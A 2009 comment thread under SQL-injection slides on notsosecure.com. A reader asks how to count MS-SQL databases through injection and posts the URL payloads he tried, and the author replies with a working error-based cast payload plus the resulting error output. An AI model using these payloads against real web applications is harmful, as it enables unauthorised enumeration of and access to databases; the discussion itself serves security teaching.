www.notsosecure.com

6 Comments

1. Benjamin
   10:33 pm on March 25th, 2009

   Hey Sumsid!

   Thanks for those slides

2. Marezzi
   8:38 pm on April 4th, 2009

   nice slides I have 1 question, how can i count how many databases are there via sql injection in MS-SQL?I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)), or Select count(name) from master.dbo.sysdatabases
   Thanks

3. sid
   8:53 pm on April 4th, 2009

   i think you are after this:

   Select count(distinct name) from master.dbo.sysdatabases

   or you can do select db_name(n)

   and enumerate n till you get null.

   Hope it helps …:)

4. Marezzi
   10:43 pm on April 5th, 2009

   tnx for info but not working.I know for the db_name(n) but i need this. asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))–
   I don’t see an error. also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))– no success
   Don’t know what to do

5. sid
   9:45 am on April 6th, 2009

   Thats because, the query returns an integer, and type conversion from int to int is valid and hence no errors.

   I will look for some more type conversions to get this returned as error message.

   You can still use the blind injection boolean query to get this value, but i think i know what are you after..

6. sid
   10:13 am on April 6th, 2009

   select cast(’total database:’+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases

   Msg 245, Level 16, State 1, Line 1
   Conversion failed when converting the nvarchar value ‘total database:6′ to data type int.